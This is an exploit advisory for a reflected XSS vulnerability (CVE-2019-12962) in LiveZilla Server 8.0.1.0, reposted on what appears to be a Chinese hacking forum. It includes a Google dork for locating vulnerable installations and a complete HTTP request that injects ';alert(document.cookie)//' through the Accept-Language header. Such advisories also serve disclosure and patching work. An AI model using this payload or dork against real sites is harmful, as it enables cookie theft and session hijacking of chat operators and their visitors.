LiveZilla Server 8.0.1.0 - 'Accept-Language' Reflected XSS

HACK1949 · 2022年11月4日

# Exploit Title: LiveZilla Server 8.0.1.0 - 'Accept-Language' Reflected XSS
# Google Dork: inurl: inurl:/mobile/index.php intitle:LiveZilla
# Date: 18 Mars 2021
# Exploit Author: Clément Cruchet
# Vendor Homepage: https://www.livezilla.net
# Software Link: https://www.livezilla.net/downloads/en/
# Version: LiveZilla Server 8.0.1.0 and before
# Tested on: Windows/Linux
# CVE : CVE-2019-12962

GET /mobile/index.php HTTP/1.1
Host: chat.website.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ';alert(document.cookie)//
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

登录

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

LiveZilla Server 8.0.1.0 - 'Accept-Language' Reflected XSS

推荐的帖子

HACK1949

链接帖子

意见的链接

分享到其他网站

黑客攻防讨论组

黑客攻防讨论组

最近浏览 0位会员

黑客世界站内导航 (SITE MAP)